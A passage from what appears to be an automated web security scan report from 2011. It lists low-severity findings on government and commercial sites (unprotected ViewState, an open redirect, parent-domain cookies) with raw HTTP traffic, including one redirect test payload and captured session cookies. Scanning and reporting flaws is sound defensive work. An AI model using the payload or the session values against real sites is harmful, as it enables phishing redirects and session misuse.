Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fpurchase%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:22 GMT
Content-Length: 37412
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNDAxNDE4NDc1D2QWAmYPZBYCAgEPFgYeA2RpcgUDbHRyHgRsYW5nBQJlbh4IeG1sOmxhbmcFAmVuFgQCAQ9kFgICAw8WAh4EVGV4dAWYBDxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2RlZmF1bHQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL1BHU3R5bGVzL3BmbG93U3RhbmRhcmQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2VuLVVTL2N1bHR1cmUuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2llLmNzcycgdHlwZT0ndGV4dC9jc3MnIG1lZGlhPSdzY3JlZW4nIC8+DQo8bGluayByZWw9J3N0eWxlc2hlZXQnIGhyZWY9Jy9VSURlc2lnbi9MZWdhY3lTaXRlL1N0eWxlcy9QcmludC5jc3MnIHR5cGU9J3RleHQvY3NzJyBtZWRpYT0ncHJpbnQnIC8+ZAIDDxYCHgZhY3Rpb24FDS9zZWN1cmUvY2FydC8WDAIHD2QWCGYPZBYCZg9kFggCAQ9kFgZmDw8WAh4LTmF2aWdhdGVVcmwFF2h0dHA6Ly9ob21lLm1jYWZlZS5jb20vZBYCZg8PFgQeDUFsdGVybmF0ZVRleHQFE01jQWZlZSDigJQgRm9yIEhvbWUeB1Rvb2xUaXAFE01jQWZlZSDigJQgRm9yIEhvbWVkZAICDw8WCB8GBRNNY0FmZWUg4oCUIEZvciBIb21lHwcFE01jQWZlZSDigJQgRm9yIEhvbWUeCEltYWdlVXJsBUNodHRwczovL3NlY3VyZWltYWdlcy5tY2FmZWUuY29tL2NvbW1vbi9tZWRpYS9pbWFnZXMvaGVhZGVyL2xvZ28uZ2lmHgdWaXNpYmxlaGRkAgQPDxYCHwMFCEZvciBIb21lZGQCAw9kFgJmDw8WAh8FBUVodHRwczovL3d3dy5tY2FmZWVzZWN1cmUuY29tL1JhdGluZ1ZlcmlmeT9yZWY9aG9tZS5tY2FmZWUuY29tJmxhbmc9RU5kFgJmDw8WBB8IBUFodHRwczovL2ltYWdlcy5zY2FuYWxlcnQuY29tL21ldGVyL2hvbWUubWNhZmVlLmNvbS8zMS5naWY/bGFuZz1FTh8HBXdNY0FmZWUgU2VjdXJlIHNpdGVzIGhlbHAga2VlcCB5b3Ugc2FmZSBmcm9tIGlkZW50aXR5IHRoZWZ0LCBjcmVkaXQgY2FyZCBmcmF1ZCwgc3B5d2FyZSwgc3BhbSwgdmlydXNlcyBhbmQgb25saW5lIHNjYW1zLhYCHg1vbmNvbnRleHRtZW51BWRqYXZhc2NyaXB0OmFsZXJ0KCJDb3B5aW5nIFByb2hpYml0ZWQgYnkgTGF3IC0gTWNBZmVlIFNFQ1VSRSBpcyBhIFRyYWRlbWFyayBvZiBNY0FmZWUiKTtyZXR1cm4gZmFsc2U7ZAIFD2QWCAIDD2QWBGYPFgIeCEN1c3RvbVVMBQVFTi1VU2QCAg8WAh8LBQVFTi1VU2QCBQ9kFgJmDw8WBB8DBRk8c3Bhbj5BYm91dCBNY0FmZWU8L3NwYW4+HwcFDEFib3V0IE1jQWZlZWRkAgcPZBYCZg8PFgQfAwUXPHNwYW4+Q29udGFjdCBVczwvc3Bhbj4fBwUKQ29udGFjdCBVc2RkAgkPZBYEZg8PFgQfAwUGU2VhcmNoHwcFBlNlYXJjaGRkAgIPD2QWAh4Jb25rZXlkb3duBbgBaWYgKChldmVudC53aGljaCA9PSAxMykgfHwgKGV2ZW50LmtleUNvZGUgPT0gMTMpKSB7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX21fSGVhZGVyRnVsbE5hdmlnYXRpb25fdWNNYXN0ZXJOYXZpZ2F0aW9uX3VjSGVhZGVyVXRpbGl0eU5hdl9TZWFyY2hfYnRuU2VhcmNoJykuY2xpY2soKTtyZXR1cm4gZmFsc2U7fWQCBw9kFgRmDxYCHwloZAICD2QWAmYPDxYCHwloZGQCAQ8PFgIfCWhkZAIDD2QWDAIBD2QWAmYPDxYCHwYFBEhvbWUWAh4FdGl0bGUFBEhvbWVkAgMPDxYEHwMFFTxzcGFuPlByb2R1Y3RzPC9zcGFuPh8HBQhQcm9kdWN0c2RkAgUPDxYEHwMFHjxzcGFuPlZpcnVzIEluZm9ybWF0aW9uPC9zcGFuPh8HBRFWaXJ1cyBJbmZvcm1hdGlvbmRkAgcPZBYCZg8PFgQfAwUcPHNwYW4+U2VjdXJpdHkgQWR2aWNlPC9zcGFuPh8HBQ9TZWN1cml0eSBBZHZpY2VkZAIJDw8WBB8DBRQ8c3Bhbj5TdXBwb3J0PC9zcGFuPh8HBQdTdXBwb3J0ZGQCCw8PFgQfAwUWPHNwYW4+RG93bmxvYWRzPC9zcGFuPh8HBQlEb3dubG9hZHNkZAIED2QWCAIBDw8WAh8JaGRkAgMPZBYCZg8PFgYfAwUKTXkgQWNjb3VudB8FBSpodHRwOi8vaG9tZS5tY2FmZWUuY29tL3Jvb3QvTXlBY2NvdW50LmFzcHgfBwUKTXkgQWNjb3VudGRkAgUPZBYCZg8PFgIfBQUkaHR0cHM6Ly9ob21lLm1jYWZlZS5jb20vc2VjdXJlL2NhcnQvZBYCZg8PFgIfBgUEQ2FydBYCHw0FBENhcnRkAgcPZBYCZg8PFgYfAwUGTG9nIEluHwUFM2h0dHBzOi8vaG9tZS5tY2FmZWUuY29tL1NlY3VyZS9Qcm90ZWN0ZWQvTG9naW4uYXNweB8HBQZMb2cgSW5kZAIJD2QWAmYPZBYEAgEPZBYGZg8PFgIfBQUXaHR0cDovL2hvbWUubWNhZmVlLmNvbS9kFgJmDw8WBB8GBRNNY0FmZWUg4oCUIEZvciBIb21lHwcFE01jQWZlZSDigJQgRm9yIEhvbWVkZAICDw8WCB8GBRNNY0FmZWUg4oCUIEZvciBIb21lHwcFE01jQWZlZSDigJQgRm9yIEhvbWUfCAVDaHR0cHM6Ly9zZWN1cmVpbWFnZXMubWNhZmVlLmNvbS9jb21tb24vbWVkaWEvaW1hZ2VzL2hlYWRlci9sb2dvLmdpZh8JaGRkAgQPDxYCHwMFCEZvciBIb21lZGQCAw9kFgJmDw8WAh8FBUVodHRwczovL3d3dy5tY2FmZWVzZWN1cmUuY29tL1JhdGluZ1ZlcmlmeT9yZWY9aG9tZS5tY2FmZWUuY29tJmxhbmc9RU5kFgJmDw8WBB8IBUFodHRwczovL2ltYWdlcy5zY2FuYWxlcnQuY29tL21ldGVyL2hvbWUubWNhZmVlLmNvbS8zMS5naWY/bGFuZz1FTh8HBXdNY0FmZWUgU2VjdXJlIHNpdGVzIGhlbHAga2VlcCB5b3Ugc2FmZSBmcm9tIGlkZW50aXR5IHRoZWZ0LCBjcmVkaXQgY2FyZCBmcmF1ZCwgc3B5d2FyZSwgc3BhbSwgdmlydXNlcyBhbmQgb25saW5lIHNjYW1zLhYCHwoFZGphdmFzY3JpcHQ6YWxlcnQoIkNvcHlpbmcgUHJvaGliaXRlZCBieSBMYXcgLSBNY0FmZWUgU0VDVVJFIGlzIGEgVHJhZGVtYXJrIG9mIE1jQWZlZSIpO3JldHVybiBmYWxzZTtkAgsPZBYGAgIPZBYEZg8PFgIfCWdkFgRmEDwrAAoAZGQCAg9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCAg9kFgRmEDwrAAoAZGQCAg9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCAw9kFgRmEDwrAAoAZGQCAg9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCBQ9kFgQCAxA8KwAKAGRkAgQPZBYCAgEPFgIfAwULU2VjdXJlIFBhZ2VkAg8PZBYGAgEPZBYEZg8PFgIfAwUKV2UgYWNjZXB0OmRkAgEPFgIeA3NyYwVOaHR0cHM6Ly9zZWN1cmVpbWFnZXMubWNhZmVlLmNvbS9sZWdhY3kvaG9tZS9wYXltZW50SWNvbnMvcGF5bWVudEljb25zRU4tVVMuZ2lmZAIDDw8WAh8DZWRkAgUPDxYCHwMFHSZjb3B5OyAyMDAzLTIwMTEgTWNBZmVlLCBJbmMuZGQCEQ9kFghmDxYCHwNlZAIDDxYCHwMFhAI8bWV0YSBuYW1lPSdXVC5tY19pZCcgIGNvbnRlbnQ9JzAnIC8+DQo8bWV0YSBuYW1lPSdXVC5tY19ldicgIGNvbnRlbnQ9J2NsaWNrJyAvPg0KPG1ldGEgbmFtZT0nV1Quel9jb3VudHJ5JyBjb250ZW50PSdFTi1VUycgLz4NCjxtZXRhIG5hbWU9J1dULnpfcmVmJyAgY29udGVudD0nT3RoZXInIC8+DQo8bWV0YSBuYW1lPSdXVC56X2NpZDEnICAgIGNvbnRlbnQ9Jzg2ODczJyAvPg0KPG1ldGEgbmFtZT0nV1Quel9jaWQyJyBjb250ZW50PSc4Njg3MycgLz4NCmQCBA8WAh8DBTM8bWV0YSBuYW1lPSdXVC5zaV9uJyAgY29udGVudD0nU2hvcHBpbmdDYXJ0SG9tZScgLz5kAgUPFgIfAwWQATxtZXRhIG5hbWU9J1dULnR4X2UnIGNvbnRlbnQ9J2EnIC8+PG1ldGEgbmFtZT0nV1Quc2lfeCcgY29udGVudD0nMScgLz48bWV0YSBuYW1lPSdXVC5wbl9za3UnIGNvbnRlbnQ9JzI4NCcgLz48bWV0YSBuYW1lPSdXVC50eF91JyBjb250ZW50PScxJyAvPmQCEw9kFgJmD2QWAmYPZBYCAgMPDxYCHwloZGQYCwVcY3RsMDAkTWFpbkNvbnRlbnQkbV9DYXJ0QmlsbGluZyRtX0FtYmlnb3VzUG9wdXAkbV9NTFN1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFLWN0bDAwJE1haW5Db250ZW50JG1fUmVjZWlwdCRtX1JlY2VpcHRGb3JtVmlldw9nZAVfY3RsMDAkTWFpbkNvbnRlbnQkbV9DYXJ0QmlsbGluZyRtX0FtYmlnb3VzUG9wdXAkbV9SZW5ld1N1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFMWN0bDAwJE1haW5Db250ZW50JG1fQ2FydEJpbGxpbmckbV9CaWxsaW5nRm9ybVZpZXcPZ2QFX2N0bDAwJE1haW5Db250ZW50JG1fQ2FydEJpbGxpbmckbV9BbWJpZ291c1BvcHVwJG1fUmVuZXdPckFkZExpY2Vuc2VBbWJpZ3VvdXMkbV9hbWJpZ291c0Zvcm1WaWV3D2dkBVdjdGwwMCRNYWluQ29udGVudCRtX0Jhc2tldCRtX0FtYmlnb3VzUG9wdXAkbV9NTFN1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFWmN0bDAwJE1haW5Db250ZW50JG1fQmFza2V0JG1fQW1iaWdvdXNQb3B1cCRtX1JlbmV3T3JBZGRMaWNlbnNlQW1iaWd1b3VzJG1fYW1iaWdvdXNGb3JtVmlldw9nZAVLY3RsMDAkTWFpbkNvbnRlbnQkbV9CaWxsaW5nJG1fQmlsbGluZ0NvbnRhaW5lclVzZXJDb250cm9sJG1fQmlsbGluZ0Zvcm1WaWV3D2dkBVpjdGwwMCRNYWluQ29udGVudCRtX0Jhc2tldCRtX0FtYmlnb3VzUG9wdXAkbV9SZW5ld1N1YnNjcmlwdGlvbkFtYmlndW91cyRtX2FtYmlnb3VzRm9ybVZpZXcPZ2QFN2N0bDAwJE1haW5Db250ZW50JG1fQ29uZmlybU9yZGVyJG1fQ29uZmlybU9yZGVyRm9ybVZpZXcPZ2QFTWN0bDAwJE1haW5Db250ZW50JG1fQmlsbGluZyRtX0pwQmlsbGluZ0NvbnRhaW5lclVzZXJDb250cm9sJG1fQmlsbGluZ0Zvcm1WaWV3D2dk" />
...[SNIP]...

11.5. http://sd.gov/headlines/headlines_home/headlines.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sd.gov
Path:   /headlines/headlines_home/headlines.aspx

Request

GET /headlines/headlines_home/headlines.aspx HTTP/1.1
Host: sd.gov
Proxy-Connection: keep-alive
Referer: http://sd.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QKQJZWS164.154.226.254CKOLQ

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 30 Apr 2011 11:12:30 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 8552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


   <!--<span id="Label1"></
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTE5NDIxOTUPZBYCAgIPZBYCZg8WAh4LXyFJdGVtQ291bnQCDxYeZg9kFgJmDxUCAzE1MDVTdGF0ZSBTZWVrcyBQcmVsaW1pbmFyeSBEYW1hZ2UgQXNzZXNzbWVudCBvZiBGbG9vZGluZ2QCAQ9kFgJmDxUCAzE0OSxTb3V0aCBEYWtvdGEgUmVjb2duaXplZCBmb3IgU291bmQgTWFuYWdlbWVudGQCAg9kFgJmDxUCAzE0ODlHb3YuIERhdWdhYXJkIEFubm91bmNlcyBEYXZpcy1CYWhjYWxsIFNjaG9sYXJzaGlwIFdpbm5lcnNkAgMPZBYCZg8VAgMxNDVFU1RBVEUgR09WRVJOTUVOVCBDUkVESVQgUkFUSU5HIFJBSVNFRCwgRklOQU5DRVMgQU1PTkcgVE9QUyBJTiBOQVRJT04gZAIED2QWAmYPFQIDMTQ2M0dvdmVybm9yJ3MgV2Vla2x5IENvbHVtbiAtIEV4cGxhbmF0aW9uIG9mIFJlZmVyZW5kYWQCBQ9kFgJmDxUCAzE0Nz9Tb3V0aCBEYWtvdGEgTmF0aW9uYWwgR3VhcmQgdG8gR2V0IEZ1bmRpbmcgZm9yIFdhdGVydG93biBBcm1vcnlkAgYPZBYCZg8VAgMxNDRBR292ZXJub3IgRGF1Z2FhcmQgT2ZmZXJzIFVwZGF0ZSBvbiBJbmNpZGVudCBhdCBTdGF0ZSBQZW5pdGVudGlhcnlkAgcPZBYCZg8VAgMxNDMzR292LiBEYXVnYWFyZCBFeHRlbmRzIENhcGl0YWwgZm9yIGEgRGF5IEludml0YXRpb25zZAIID2QWAmYPFQIDMTQyREdvdmVybm9yIEFza3MgRm9yIEZsYWdzIGF0IEhhbGYtU3RhZmYgRm9yIFNsYWluIENvcnJlY3Rpb25hbCBPZmZpY2VyZAIJD2QWAmYPFQIDMTQxrgFBIHN0YXRlbWVudCBmcm9tIEdvdi4gRGVubmlzIERhdWdhYXJkIG9uIHRoZSBkZWF0aCBvZiBSb25hbGQgSm9obnNvbiwgYSBTb3V0aCBEYWtvdGEgUGVuaXRlbnRpYXJ5IGNvcnJlY3Rpb25hbCBvZmZpY2VyLCBkdXJpbmcgYSBmYWlsZWQgZXNjYXBlIGF0dGVtcHQgdG9kYXkgYnkgdHdvIHByaXNvbmVyczpkAgoPZBYCZg8VAgMxNDBCR292LiBEYXVnYWFyZCBzYXlzIFN0YXRlIEdvdmVybm1lbnQgUHJlcGFyaW5nIGZvciBGZWRlcmFsIFNodXRkb3duZAILD2QWAmYPFQIDMTM4OkdvdmVybm9yIERhdWdhYXJkIEFwcG9pbnRzIENoZXJ5bGUgR2VyaW5nIGFzIENpcmN1aXQgSnVkZ2VkAgwPZBYCZg8VAgMxMzl5R292LiBEYXVnYWFyZCBEZXNpZ25hdGVzIFN0YXRlIFNlcnZpY2UgQ29tbWlzc2lvbiB0byBJbmNyZWFzZSBWb2x1bnRlZXIgT3Bwb3J0dW5pdGllcyBhbmQgU3RyZW5ndGhlbiB0aGUgTm9ucHJvZml0IFNlY3RvcmQCDQ9kFgJmDxUCAzEzNjtHb3YuIERhdWdhYXJkIEFwcG9pbnRzIE1lbG9keSBTY2hvcHAgYXMgRWR1Y2F0aW9uIFNlY3JldGFyeWQCDg9kFgJmDxUCAzEzNTNEYXJpbiBCZXJncXVpc3QgU2VsZWN0ZWQgQXMgMjAxMSBIZW5yeSBUb2xsIEZlbGxvdyBkZA==" />
...[SNIP]...

11.6. http://www.vitalchek.com/louisiana-express-vital-records.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vitalchek.com
Path:   /louisiana-express-vital-records.aspx

Request

GET /louisiana-express-vital-records.aspx HTTP/1.1
Host: www.vitalchek.com
Proxy-Connection: keep-alive
Referer: http://www.dhh.louisiana.gov/offices/page.asp?id=252&detail=7752
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=QUIPIMSvcnwpis06CKQLL; ASP.NET_SessionId=ds1bdfytc0khvr45hs3mgz55; site_5_clickid=646829930273374210%2c44155372%2c44155372; CampaignStamp=4/29/2011 8:08:21 PM

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:08:24 GMT
Server: Microsoft-IIS/6.0
X-XSS-Protection: 0
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 39282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ5MzM5OTc4NmQYBgUYY3RsMDAkU2NlbmFyaW9IVE1MSGVhZGVyDw9kZmQFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYEBSRjdGwwMCRtaWRkbGVDb250ZW50JGN0bDAwJGJpcnRoUmFkaW8FJGN0bDAwJG1pZGRsZUNvbnRlbnQkY3RsMDAkZGVhdGhSYWRpbwUnY3RsMDAkbWlkZGxlQ29udGVudCRjdGwwMCRtYXJyaWFnZVJhZGlvBSZjdGwwMCRtaWRkbGVDb250ZW50JGN0bDAwJGRpdm9yY2VSYWRpbwU5Y3RsMDAkbWlkZGxlQ29udGVudCRjdGwwMCRRdWlja1ByaWNpbmdDb250cm9sJFNraW5DaG9vc2VyDxQrAAJlBQdXZWJCbHVlZAUwY3RsMDAkbWlkZGxlQ29udGVudCRBZ2VuY3lMb2NhdG9yU2NlbmFyaW9Db250ZW50Dw9kZmQFIGN0bDAwJFNjZW5hcmlvUHJlc2VudGF0aW9uRm9vdGVyDw9kZmQFIGN0bDAwJFNjZW5hcmlvUHJlc2VudGF0aW9uSGVhZGVyDw9kZmQ=" />
...[SNIP]...

12. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/42550049/

Issue detail

The value of the imageUrl request parameter is used to perform an HTTP redirect. The payload http%3a//ae6de480926c6ad71/a%3fhttp%3a//www.alabama.gov/images/livehelp_2010/ was submitted in the imageUrl parameter. This caused a redirection to the following URL:

Request

GET /hc/42550049/?cmd=repstate&site=42550049&&ver=1&imageUrl=http%3a//ae6de480926c6ad71/a%3fhttp%3a//www.alabama.gov/images/livehelp_2010/ HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1304123898833

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 01:21:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: http://ae6de480926c6ad71/a?http://www.alabama.gov/images/livehelp_2010/repoffline.gif&d=1304126515516
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


13. Cookie scoped to parent domain  previous  next
There are 130 instances of this issue:


13.1. http://api.twitter.com/1/statuses/user_timeline/okgov.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/okgov.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/okgov.json?callback=jsonp1304161991771&_=1304162000904&count=10&include_rts=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304161979-9408-31010
X-RateLimit-Limit: 150
ETag: "f58fa246b7f135099591673864c676d6"-gzip
Last-Modified: Sat, 30 Apr 2011 11:12:59 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01693
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bef0a1d7
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1304165579
Set-Cookie: original_referer=Vs%2BEmu1btvu7J2ukepX8yw%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCC2MHKYvAToHaWQiJTA2ZmNmNTgzMGMwZmUx%250AMjdiMTRiYjFhOTBkMDYzMGM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--357fde6f95e605cea2269a9db9ba5ff1f4d641b0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 24069

jsonp1304161991771([{"retweeted_status":{"text":"Congratulations @OKCThunder on the first playoff series victory for our franchise! Let's Go Thunder!","in_reply_to_status_id":null,"truncated":false,"p
...[SNIP]...

13.2. https://fin.oaks.ohio.gov/psp/FNPRD/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://fin.oaks.ohio.gov
Path:   /psp/FNPRD/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psp/FNPRD/ HTTP/1.1
Host: fin.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: fin.oaks.ohio.gov=R1934382832; path=/
Date: Sat, 30 Apr 2011 12:20:09 GMT
Content-Length: 12902
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: FNPRD-PORTAL-PSJSESSIONID=8SKyN72hGDFKBkl1QC8vYfpb7c1J2114!-669996233; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...

13.3. https://hcm.oaks.ohio.gov/psp/HCPRD/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://hcm.oaks.ohio.gov
Path:   /psp/HCPRD/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psp/HCPRD/ HTTP/1.1
Host: hcm.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: hcm.oaks.ohio.gov=R2338435115; path=/
Date: Sat, 30 Apr 2011 12:20:31 GMT
Content-Length: 14341
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: HCPRD-PORTAL-PSJSESSIONID=l6sLN72PQQ42bBRK22SfpKLTH5zqJJvN!-609733431; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...

13.4. http://home.mcafee.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; 